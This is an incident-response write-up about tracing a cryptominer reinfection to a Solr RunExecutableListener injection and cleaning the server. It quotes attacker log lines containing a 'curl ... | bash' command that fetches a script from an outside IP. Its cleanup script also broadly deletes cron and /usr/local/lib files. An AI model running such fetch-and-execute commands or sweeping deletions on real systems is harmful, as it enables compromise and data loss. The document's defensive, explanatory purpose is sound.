1. Reference articles:
https://blog.csdn.net/xinxin_2011/article/details/84936581
https://blog.csdn.net/xinxin_2011/article/details/85047245
These articles describe how the compromised server behaves and where the malware files are located, and they provide a cleanup script. I made a few small changes to that script; its contents are as follows:
#!/bin/bash
# Cleanup script, adapted from the second reference article.
# /etc is kept immutable: lift the flag, clear the ld.so.preload hijack and the cron drop-ins, then restore it.
chattr -i /etc
echo "" > /etc/ld.so.preload
rm -rf /etc/cron.d/*
rm -f /etc/cron.hourly/oanacroner1
chattr +i /etc
# Per-user crontabs.
chattr -i /var/spool/cron/
rm -rf /var/spool/cron/*
chattr +i /var/spool/cron/
# Dropped libraries; note that this removes every file under /usr/local/lib and then locks the directory.
chattr -i /usr/local/lib/*
rm -f /usr/local/lib/*
chattr +i /usr/local/lib
# Stop the miner processes and remove their files from the temp directories.
killall sustse
killall kworkerds
rm -f /var/tmp/kworkerds*
rm -f /var/tmp/1.so
rm -f /var/tmp/sustse*
rm -f /tmp/kworkerds*
rm -f /tmp/1.so
rm -f /var/tmp/wc.conf
rm -f /tmp/wc.conf
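The script above deletes first and records nothing. As an added example (not from the original post or the referenced articles), here is a read-only audit in POSIX sh that checks the same persistence points and reports what it finds, so a host can be checked before and after cleanup and the output kept as evidence. The optional ROOT prefix argument, the FINDING/REVIEW labels and the "download piped into a shell" heuristic for cron entries are this editor's choices, not something the post describes.

```shell
#!/bin/sh
# Added example, not part of the original post: read-only audit of the
# persistence locations the cleanup script wipes. ROOT is an optional prefix
# (a mounted disk image or a test tree); empty means the live system.

audit_persistence() {
  root="${1:-}"
  findings=0

  # 1. /etc/ld.so.preload is empty or absent on almost every normal host;
  #    a non-empty one is a library-injection persistence point.
  if [ -s "$root/etc/ld.so.preload" ]; then
    echo "FINDING: non-empty $root/etc/ld.so.preload:"
    sed 's/^/    /' "$root/etc/ld.so.preload"
    findings=$((findings + 1))
  fi

  # 2. Cron drop-ins and per-user crontabs: flag entries that download and
  #    run remote content; list everything else for manual review only.
  for f in "$root"/etc/cron.d/* "$root"/etc/cron.hourly/* "$root"/etc/cron.daily/* \
           "$root"/var/spool/cron/* "$root"/var/spool/cron/crontabs/*; do
    [ -f "$f" ] || continue
    if grep -Eq '(curl|wget)[^|]*[|][[:space:]]*(ba)?sh' "$f"; then
      echo "FINDING: cron entry downloads and executes remote content: $f"
      findings=$((findings + 1))
    else
      echo "REVIEW:  cron entry $f"
    fi
  done

  # 3. Artifact names from this incident in the temp directories.
  for p in "$root"/tmp/kworkerds* "$root"/var/tmp/kworkerds* \
           "$root"/tmp/sustse*    "$root"/var/tmp/sustse*    \
           "$root"/tmp/1.so       "$root"/var/tmp/1.so       \
           "$root"/tmp/wc.conf    "$root"/var/tmp/wc.conf; do
    [ -e "$p" ] || continue
    echo "FINDING: known artifact $p"
    findings=$((findings + 1))
  done

  # 4. Running processes with the miner's names (live system only).
  if [ -z "$root" ]; then
    for n in sustse kworkerds; do
      if pgrep -x "$n" >/dev/null 2>&1; then
        echo "FINDING: process '$n' is running (pids: $(pgrep -x "$n" | tr '\n' ' '))"
        findings=$((findings + 1))
      fi
    done
  fi

  echo "total findings: $findings"
  [ "$findings" -eq 0 ]   # exit status 0 only on a clean host
}

# Set AUDIT_RUN=1 to audit on execution (first argument = ROOT); otherwise
# source this file and call audit_persistence directly.
if [ "${AUDIT_RUN:-0}" = 1 ]; then audit_persistence "${1-}"; fi
```

Run it as root on the live host so the crontab spool is readable, or point ROOT at a mounted image; because the exit status is non-zero whenever something was flagged, the function can be scheduled as a recurring check after cleanup to catch the reinfection the post describes.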
2. Tracing the intrusion
After running the script from the second reference article, the intrusion programs such as sustse were removed, but not long afterwards they came back to life. This differed from what the reference articles described, so I decided to find the program's way in myself.
(1) Ran last, lastlog and similar commands; no sign of abnormal logins.
(2) Checked /etc/passwd, /etc/shadow and similar files; no unexpected user accounts had been added.
(3) Since the intruding program starts periodically, I checked the /etc/cron.* directories and found the intrusion script oanacroner1 in cron.hourly. Deleted it, and updated the cleanup script by adding rm -f /etc/cron.hourly/oanacroner1.
At this point I quietly celebrated, thinking the problem was solved for good, but before long the program appeared again. Headache.
(4) The server runs Redis, which reminded me of the Redis unauthorized-access vulnerability, but nothing mentioning Redis turned up in the cron files.
(Vulnerability details: https://www.freebuf.com/vuls/162035.html)
(5) Fell back to the most primitive method, searching the whole filesystem for that IP address:
cd /
grep -r 158.69.133.18 ./*
which returned the following:
./beecarry/software/purchase_search/solr-5.2.1/server/logs/solr_log_20190212_0936:INFO  - 2019-02-12 01:40:19.308; [  beecarry_customer_shard1_replica2] org.apache.solr.core.SolrCore; [[beecarry_customer_shard1_replica2] ] Added SolrEventListener for newSearcher: [org.apache.solr.core.RunExecutableListener{exe=sh,args=[-c, curl -s http://158.69.133.18:8220/mr.sh | bash -sh],event=newSearcher,dir=/bin/}]
./beecarry/software/purchase_search/solr-5.2.1/server/logs/solr_log_20190212_0936:INFO  - 2019-02-12 01:40:19.397; [  beecarry_customer_shard1_replica2] org.apache.solr.core.SolrCore; [[beecarry_customer_shard1_replica2] ] Added SolrEventListener for newSearcher: [org.apache.solr.core.RunExecutableListener{exe=sh,args=[-c, curl -s http://158.69.133.18:8220/mr.sh | bash -sh],event=newSearcher,dir=/bin/}]
./beecarry/software/purchase_search/solr-5.2.1/server/logs/solr-8984-console.log:3686 [coreLoadExecutor-5-thread-1-processing-{node_name=*.*.*.*:8984_solr}] INFO  org.apache.solr.core.SolrCore  [  beecarry_customer_shard1_replica1] – [[beecarry_customer_shard1_replica1] ] Added SolrEventListener for newSearcher: [org.apache.solr.core.RunExecutableListener{exe=sh,args=[-c, curl -s http://158.69.133.18:8220/mr.sh | bash -sh],event=newSearcher,dir=/bin/}]
./beecarry/software/purchase_search/solr-5.2.1/server/logs/solr_log_20190212_0937:INFO  - 2019-02-12 01:41:04.474; [  beecarry_customer_shard1_replica1] org.apache.solr.core.SolrCore; [[beecarry_customer_shard1_replica1] ] Added SolrEventListener for newSearcher: [org.apache.solr.core.RunExecutableListener{exe=sh,args=[-c, curl -s http://158.69.133.18:8220/mr.sh | bash -sh],event=newSearcher,dir=/bin/}]
./beecarry/software/purchase_search/solr-5.2.1/server/logs/solr_log_20190212_0937:INFO  - 2019-02-12 01:41:04.526; [  beecarry_customer_shard1_replica1] org.apache.solr.core.SolrCore; [[beecarry_customer_shard1_replica1] ] Added SolrEventListener for newSearcher: [org.apache.solr.core.RunExecutableListener{exe=sh,args=[-c, curl -s http://158.69.133.18:8220/mr.sh | bash -sh],event=newSearcher,dir=/bin/}]
./beecarry/software/purchase_search/solr-5.2.1/server/logs/solr-8983-console.log:3712 [coreLoadExecutor-5-thread-1-processing-{node_name=*.*.*.*:8983_solr}] INFO  org.apache.solr.core.SolrCore  [  beecarry_customer_shard1_replica2] – [[beecarry_customer_shard1_replica2] ] Added SolrEventListener for newSearcher: [org.apache.solr.core.RunExecutableListener{exe=sh,args=[-c, curl -s http://158.69.133.18:8220/mr.sh | bash -sh],event=newSearcher,dir=/bin/}]
./beecarry/software/purchase_search/solr-5.2.1/server/logs/solr-8983-console.log:3713 [coreLoadExecutor-5-thread-1-processing-{node_name=*.*.*.*:8983_solr}] INFO  org.apache.solr.core.SolrCore  [  beecarry_customer_shard1_replica2] – [[beecarry_customer_shard1_replica2] ] Added SolrEventListener for newSearcher: [org.apache.solr.core.RunExecutableListener{exe=sh,args=[-c, curl -s http://158.69.133.18:8220/mr.sh | bash -sh],event=newSearcher,dir=/bin/}]
Found it at last: the attacker had exploited a Solr vulnerability.
(Vulnerability details: https://issues.apache.org/jira/browse/SOLR-11482)
Open the Solr admin console and, under configs/beecarry_customer for the cluster, find the file configoverlay.json; it contains the name of the newly added listener.
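The grep above found the registrations only because the attacker's IP address was already known. The following added example (not from the original post) parses Solr log lines in the two formats shown above and lists every RunExecutableListener registration, with the core, the event and the command it runs, plus the URLs those commands fetch, so the same log data becomes a check that needs no prior indicator. The sample lines are constructed after the ones above (node name masked as on the page) and the function names are this editor's.

```shell
#!/bin/sh
# Added example, not from the original post: find RunExecutableListener
# registrations in Solr logs and extract what they execute.

# Constructed sample in the two log formats shown in the post, plus one benign line.
SAMPLE_LOG=$(cat <<'EOF'
INFO  - 2019-02-12 01:40:19.308; [  beecarry_customer_shard1_replica2] org.apache.solr.core.SolrCore; [[beecarry_customer_shard1_replica2] ] Added SolrEventListener for newSearcher: [org.apache.solr.core.RunExecutableListener{exe=sh,args=[-c, curl -s http://158.69.133.18:8220/mr.sh | bash -sh],event=newSearcher,dir=/bin/}]
3686 [coreLoadExecutor-5-thread-1-processing-{node_name=*.*.*.*:8984_solr}] INFO  org.apache.solr.core.SolrCore  [  beecarry_customer_shard1_replica1] - [[beecarry_customer_shard1_replica1] ] Added SolrEventListener for newSearcher: [org.apache.solr.core.RunExecutableListener{exe=sh,args=[-c, curl -s http://158.69.133.18:8220/mr.sh | bash -sh],event=newSearcher,dir=/bin/}]
INFO  - 2019-02-12 01:40:20.001; [  beecarry_customer_shard1_replica2] org.apache.solr.core.SolrCore; [[beecarry_customer_shard1_replica2] ] Registered new searcher Searcher@1a2b3c[beecarry_customer_shard1_replica2] main
EOF
)

# Read log text on stdin; print one line per distinct registration.
# The "[[core] ]" token is common to both log formats, so it anchors the core name;
# exe, args, event and dir are taken from the listener's toString() in the message.
scan_solr_log() {
  grep 'RunExecutableListener{' |
    sed -n 's/.*\[\[\([^]]*\)] ].*RunExecutableListener{exe=\([^,]*\),args=\[\([^]]*\)],event=\([^,]*\),dir=\([^}]*\)}.*/core=\1 event=\4 exe=\2 dir=\5 args=[\3]/p' |
    sort -u
}

# Read log text on stdin; print the distinct URLs the registered commands fetch
# (indicators to block at the firewall and hunt for in proxy logs).
listener_urls() {
  grep 'RunExecutableListener{' |
    grep -oE 'https?://[^] |]+' |
    sort -u
}

# Demo on the constructed sample; on a real host use:
#   cat /path/to/solr/server/logs/* | scan_solr_log
printf '%s\n' "$SAMPLE_LOG" | scan_solr_log
printf '%s\n' "$SAMPLE_LOG" | listener_urls
```

Because the registration is logged every time a core loads, the scan also reveals how long the listener has been present: the earliest matching timestamp across the rotated log files is the lower bound for when the config was changed.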

Then run:
curl http://*.*.*.*:8983/solr/beecarry_customer/config -H 'Content-type:application/json' -d '{"delete-listener" : "newlistener-26"}'
to delete the listener that the intruder added.
Added firewall rules so that Solr cannot be reached from outside the network, ran the script above to remove the intrusion programs from the host, and with that the problem was finally resolved.
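The two steps above (read the listener's name out of configoverlay.json, then call the Config API with delete-listener) can be scripted so that every collection on the host is checked the same way, and so that what the listener executed is recorded before it is removed. The following is an added example, not the post's own procedure or Solr's code: SOLR_URL, the function names and the sample overlay document are assumptions, and the overlay layout (listener name mapped to its properties under "listener", returned under "overlay" by GET /solr/<collection>/config/overlay) is how this editor assumes Solr's Config API presents it; compare against your own instance's output before relying on it.

```shell
#!/bin/sh
# Added example, not from the original post: audit a collection's config
# overlay for RunExecutableListener entries and remove them with the same
# delete-listener call the post uses.

SOLR_URL="${SOLR_URL:-http://127.0.0.1:8983}"   # assumed; point at the real host

# Constructed sample of what GET /solr/<collection>/config/overlay is assumed to return:
# one malicious listener and one legitimate warm-up listener.
SAMPLE_OVERLAY='{"responseHeader":{"status":0,"QTime":1},"overlay":{"znodeVersion":3,"listener":{"newlistener-26":{"event":"newSearcher","class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c","curl -s http://158.69.133.18:8220/mr.sh | bash -sh"]},"warmup":{"event":"firstSearcher","class":"solr.QuerySenderListener"}}}}'

# Overlay JSON on stdin -> one '"name":{...}' fragment per RunExecutableListener.
# Newlines are dropped first so pretty-printed output from the admin UI works too;
# the match stops at the entry's own braces, so other listeners are not swallowed.
exec_listener_entries() {
  tr -d '\n\r' |
    grep -oE '"[^"]*"[[:space:]]*:[[:space:]]*\{[^{}]*RunExecutableListener[^{}]*\}'
}

# Just the listener names (what delete-listener needs).
exec_listener_names() {
  exec_listener_entries | sed -E 's/^"([^"]*)".*/\1/'
}

# Name plus the command each listener runs, for the incident record
# (assumes "exe" precedes "args" in the entry, as in the sample).
exec_listener_commands() {
  exec_listener_entries |
    sed -E 's/^"([^"]*)".*"exe"[[:space:]]*:[[:space:]]*"([^"]*)".*"args"[[:space:]]*:[[:space:]]*\[([^]]*)].*/\1: exe=\2 args=[\3]/'
}

fetch_overlay() {   # $1 = collection
  curl -s "$SOLR_URL/solr/$1/config/overlay"
}

delete_listener() { # $1 = collection, $2 = listener name (the call from the post)
  curl -s "$SOLR_URL/solr/$1/config" -H 'Content-type:application/json' \
       -d "{\"delete-listener\":\"$2\"}"
}

# Report the executable listeners of one collection; with "remove" as the
# second argument, delete each one after printing it.
audit_collection() {
  coll="$1"; mode="${2:-report}"
  overlay=$(fetch_overlay "$coll")
  printf '%s' "$overlay" | exec_listener_commands
  if [ "$mode" = remove ]; then
    printf '%s' "$overlay" | exec_listener_names | while read -r name; do
      echo "deleting listener $name from $coll"
      delete_listener "$coll" "$name"
    done
  fi
}

# Demo on the constructed sample (no network); against a live host run e.g.
#   audit_collection beecarry_customer          # report only
#   audit_collection beecarry_customer remove   # report, then delete
printf '%s' "$SAMPLE_OVERLAY" | exec_listener_commands
```

Run the report form first and keep its output with the log findings; the overlay is also worth re-checking after the firewall change, because a listener that is still registered will fire again on the next core load regardless of who can reach the port.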
3. Summary
(1) Wherever possible, expose services only on the internal network, not to the Internet.
(2) Edit the service's configuration to enable its authentication features.
I recorded the process of tracking down this intrusion mainly as a note to myself, and also in the hope that it serves as a reference for anyone who runs into the same problem; I hope everyone finds the fix they need.